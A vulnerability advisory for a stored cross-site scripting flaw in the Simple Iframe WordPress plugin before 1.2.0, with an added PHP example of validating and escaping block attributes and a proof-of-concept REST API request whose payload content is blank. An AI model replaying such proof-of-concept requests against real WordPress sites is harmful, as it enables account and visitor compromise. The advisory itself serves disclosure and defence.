Source: wpvulndb
Author: Jihoon Lee (AhnLab)
WPVDB-ID: 97AAC334-5323-41BB-90F0-D180BCC9162F
History: Jun 19, 2023 - 12:00 a.m.

Simple Iframe < 1.2.0 - Contributor+ Stored XSS

2023-06-19 00:00:00
Jihoon Lee (AhnLab)
wpscan.com
5
Tags: simple iframe, wordpress, contributor+ role, stored xss, validation

EPSS: 0.001 (Low)
EPSS Percentile: 19.7%

The plugin does not properly validate one of its WordPress block attribute’s content, which may allow users whose role is at least that of a contributor to conduct Stored Cross-Site Scripting attacks.
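The advisory's root cause is a block attribute whose content reaches the rendered page without validation or escaping. The following is an added example, not the Simple Iframe plugin's own code: a hypothetical dynamic block render callback that treats every block attribute as untrusted input, rejects non-http(s) URLs before rendering, and escapes at output. The block name (example/iframe) and attribute names (src, width, height, title) are assumptions for illustration.

```php
<?php
/**
 * Added example (not the plugin's code): render a block whose attributes are
 * supplied by Contributor+ users and must therefore be treated as untrusted.
 * Block name and attribute names are assumptions.
 */
function example_iframe_block_render( array $attributes ): string {
    $src = isset( $attributes['src'] ) ? (string) $attributes['src'] : '';

    // Validate: only absolute http(s) URLs are rendered at all. This drops
    // javascript:, data: and relative values instead of trying to repair them.
    $scheme = wp_parse_url( $src, PHP_URL_SCHEME );
    if ( ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        return '';
    }

    // Dimensions are coerced to non-negative integers; non-numeric input
    // becomes 0 here and is replaced by the defaults below.
    $width  = isset( $attributes['width'] )  ? absint( $attributes['width'] )  : 0;
    $height = isset( $attributes['height'] ) ? absint( $attributes['height'] ) : 0;
    $width  = $width  > 0 ? $width  : 600;
    $height = $height > 0 ? $height : 400;
    $title  = isset( $attributes['title'] ) ? (string) $attributes['title'] : '';

    // Escape at output: esc_url() with an explicit protocol allow-list for the
    // URL, esc_attr() for free text placed inside a quoted HTML attribute.
    return sprintf(
        '<iframe src="%s" width="%d" height="%d" title="%s" loading="lazy"></iframe>',
        esc_url( $src, array( 'http', 'https' ) ),
        $width,
        $height,
        esc_attr( $title )
    );
}

// Declaring attribute types lets the block editor and REST layer reject
// values of the wrong type before the render callback ever sees them.
register_block_type( 'example/iframe', array(
    'attributes'      => array(
        'src'    => array( 'type' => 'string' ),
        'width'  => array( 'type' => 'integer', 'default' => 600 ),
        'height' => array( 'type' => 'integer', 'default' => 400 ),
        'title'  => array( 'type' => 'string' ),
    ),
    'render_callback' => 'example_iframe_block_render',
) );
```

The two controls are independent: the scheme check decides whether a value is rendered at all, and the escaping functions decide how it is rendered. Either one alone leaves a gap (a valid URL can still carry a quote that breaks out of the attribute, and escaping alone does not stop a javascript: URL from being a working link), which is why the callback applies both.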

PoC

POST /wp-json/wp/v2/posts/60?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 378
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/json
Accept: application/json, */*;q=0.1
X-WP-Nonce: 653192f849
X-HTTP-Method-Override: PUT
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/wp-admin/post-new.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [Contributor+]
Connection: close

{"id":60,"title":"XSS TEST","content":"\n\n","status":"publish"}

CPE Name        Operator    Version
simple-iframe   lt          1.2.0

